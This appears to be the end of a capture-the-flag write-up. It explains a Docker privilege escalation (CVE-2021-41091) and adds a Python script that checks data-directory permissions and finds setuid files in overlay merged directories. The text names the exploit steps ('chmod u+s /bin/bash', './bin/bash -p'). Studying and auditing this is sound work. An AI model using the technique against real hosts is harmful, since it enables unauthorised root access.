    Root flag captured! The chain works because the container's root is the host's uid 0 (no user namespace remapping), so the setuid bit set inside the container is honoured when marcus runs the same file through the overlay merged path on the host, a path the Docker data-directory permissions should have kept him out of.
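As an added example (not part of the writeup or of the GitHub PoC it uses), the host-side checks behind CVE-2021-41091 in Python: whether the Docker data directory is traversable by other users (the bug), which overlay "merged" directories are mounted (read from /proc/self/mountinfo, since overlay2/ itself cannot be listed), and which setuid files sit inside them (the chmod u+s /bin/bash from step one). The mountinfo excerpt is constructed and the layer names in it are made up.

```python
import os
import stat
from pathlib import Path


def data_dir_world_traversable(docker_root):
    """The bug in one bit: /var/lib/docker was created 0701, so any local user can
    descend into overlay2/<id>/merged even though they cannot list /var/lib/docker.
    Docker 20.10.9 creates the data directory 0710 (no 'other' execute bit)."""
    mode = stat.S_IMODE(os.stat(docker_root).st_mode)
    return bool(mode & stat.S_IXOTH)


def merged_dirs_from_mountinfo(mountinfo_text, docker_root="/var/lib/docker"):
    """Collect the mount points of overlay filesystems under docker_root from the
    text of /proc/self/mountinfo, which any user can read even when overlay2/
    cannot be listed.
    Format: id parent maj:min root mountpoint opts [optional...] - fstype source superopts"""
    dirs = []
    for line in mountinfo_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or "-" not in fields:
            continue
        sep = fields.index("-")
        if sep + 1 >= len(fields):
            continue
        mountpoint = fields[4].replace("\\040", " ")
        fstype = fields[sep + 1]
        if fstype == "overlay" and mountpoint.startswith(docker_root.rstrip("/") + "/"):
            dirs.append(mountpoint)
    return dirs


def is_setuid_regular(st_mode):
    """Regular file carrying the setuid bit (symlinks and directories are ignored)."""
    return stat.S_ISREG(st_mode) and bool(st_mode & stat.S_ISUID)


def find_setuid_files(merged_dirs):
    """Walk each merged directory the current user can reach and return
    (path, owner uid) for every setuid file. A 'chmod u+s /bin/bash' done as root
    inside the container appears here as a uid-0 setuid binary on the host, which is
    exactly what './bin/bash -p' in the exploit relies on."""
    found = []
    for merged in merged_dirs:
        for root, _dirs, files in os.walk(merged):
            for name in files:
                path = Path(root) / name
                try:
                    st = path.lstat()
                except OSError:
                    continue
                if is_setuid_regular(st.st_mode):
                    found.append((str(path), st.st_uid))
    return found


# Constructed mountinfo excerpt (not copied from the box): one ext4 root and two
# overlay mounts where Docker's overlay2 driver puts them. Layer names are invented.
SAMPLE_MOUNTINFO = """\
24 1 8:1 / / rw,relatime - ext4 /dev/sda1 rw
310 24 0:51 / /var/lib/docker/overlay2/layerA/merged rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/A
412 24 0:60 / /var/lib/docker/overlay2/layerB/merged rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/B
"""

if __name__ == "__main__":
    root = "/var/lib/docker"
    if os.path.exists(root):
        print("data dir traversable by others:", data_dir_world_traversable(root))
    with open("/proc/self/mountinfo") as f:
        merged = merged_dirs_from_mountinfo(f.read(), root)
    for path, uid in find_setuid_files(merged):
        print(f"setuid (uid {uid}): {path}")
```

Run as an unprivileged user on a patched host, the walk finds nothing because the 0710 data directory stops it at the first step; on the vulnerable host it lists the container's /bin/bash with uid 0, which is the same path exp.sh printed above.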

Summary

Overall a fairly easy box, with nothing that really gets you stuck; quite beginner-friendly.